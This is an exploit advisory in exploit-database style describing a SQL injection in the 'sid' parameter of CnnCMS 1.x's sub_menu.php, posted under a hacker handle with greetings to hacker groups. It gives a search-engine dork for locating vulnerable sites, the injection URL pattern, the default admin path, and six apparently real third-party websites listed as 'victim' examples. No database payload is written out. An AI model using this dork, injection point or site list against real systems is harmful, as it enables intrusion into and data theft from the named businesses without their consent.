CnnCMS version 1.x suffers from a remote SQL injection vulnerability.
d436ff041fb8f812be29f707d33b193967410e1cfb4f891ca66db3f737c8e6dd
=========================================================================
CnnCMS 1.x SQL Injection Vulnerability
=========================================================================
:-------------------------------------------------------------------------------------------------------------------------::
# Exploit Title : CnnCMS 1.x SQL Injection Vulnerability:
# Date : March 3rd 2012:
# Author : X-Cisadane:
# Software Link : https://www.thinknolimits.com/:
# Version : 1.x:
# Category : Web Applications :
# Vulnerability : SQL Injection:
# Tested On : Google Chrome 14.0.835 (Windows):
# Dorks : inurl:sub_menu.php?sid=:
# Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari:-------------------------------------------------------------------------------------------------------------------------:
SQL Injection Vulnerability:
- Open Victim Website : https://<site>/<CnnCMS Path>/sub_menu.php?sid=-[SQL]
Example:
https://garden-goldenteakfurniture.com/sub_menu.php?sid=-13
https://lunar.co.id/sub_menu.php?sid=-1
https://www.djawaleather.com/sub_menu.php?sid=-1
https://www.gravigra.com/sub_menu.php?sid=-1
https://www.harpagreen.com/sub_menu.php?sid=-2
https://www.suwastama.co.id/sub_menu.php?sid=-1
Admin Page (Default) : https://<site>/<CnnCMS Path>/admin/